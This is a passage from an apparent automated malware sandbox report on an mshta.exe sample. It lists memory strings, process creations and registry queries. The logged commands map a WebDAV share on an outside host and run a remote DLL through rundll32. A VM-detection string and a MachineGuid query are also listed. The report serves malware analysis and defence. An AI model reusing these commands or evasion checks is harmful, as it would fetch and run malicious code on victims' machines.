bcZ59EdWPRbWEoLgpVdNdC4WSaMuMpNvkr1eg04Y00SesS9IAVuuPQpls2adNYMefTpervR11oDGywsG6jA54Uel48rSv34vW3Lq4EwxFh3P0QvWJYAk9IyuiV7pCCj1QJezNTFkMKakrl1AMgF5t9AgKUDBlIpCOftpFBN3N6aOcy56UHgfSBsTLF9XR35sZbOWDpAkNsuyK9VsNeI6aZMW4BLwKDZpepc5Q1LV7HqQYLJj25J2UCGtz4YQj34GvPiIPvt0v8JCC0EmUcd
Source: mshta.exe, 00000000.00000003.1353347251.0000000006BBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1353289336.0000000006BBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1363655021.0000000006BBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UHgfSBsTLF9XR35sZbOWDpAkNsuyK9VsNeI6aZMW4BLwKDZpepc5Q1LV7HqQYLJj25J2UCGtz4YQj34GvPiIPvt0v8JCC0EmUcd
Source: mshta.exe, 00000000.00000003.1357251887.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1359012847.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1359779008.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: mshta.exe, 00000000.00000003.1358050857.0000000005EA5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: epyc|qemu|kvm|xeon|broadNatK($&
Source: mshta.exe, 00000000.00000003.1350769128.0000000007237000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352893472.0000000006A32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352235865.0000000006784000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352475996.0000000006833000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1353064285.0000000006AB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1353008981.0000000006AB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352757029.000000000693B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1348355677.0000000007AB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352893472.00000000069F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1353347251.0000000006B3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1347584755.0000000006DF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fW9P1R70625bzjxKq6t5RdjjyM33YZsVAjowsnPb3FLpu77zvliz4tUN5VQiw6FVxTYkN1hARqCfAfApuMUahRvLoI57zALW5iKeCqfsK1Rgw3pt61mFHpcV0drIp7T235u4Mjmji3MymFVgl85Z8zqB5j9sv50cnk9HQnQitojS2nGG0BABbk3xnfGiXpmQEmU4s2LQRX4QFKeTna3Az5kTXq5NconRNOzK2QsyjQqRMSGSto6XuKGIDhXMvcYhM0zOmsUagmlXg7PdkXP
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c net use V: \\6t.lc@ssl\nz && C:\Windows\system32\rundll32 V:\mw\37.dll,%time%
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 200 && net use V: /d /y
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net use V: \\6t.lc@ssl\nz
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32 V:\mw\37.dll, 7:02:13.25
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 200
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net use V: /d /y
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\net.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c net use V: \\6t.lc@ssl\nz && C:\Windows\system32\rundll32 V:\mw\37.dll,%time%
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 200 && net use V: /d /y
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net use V: \\6t.lc@ssl\nz
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net use V: /d /y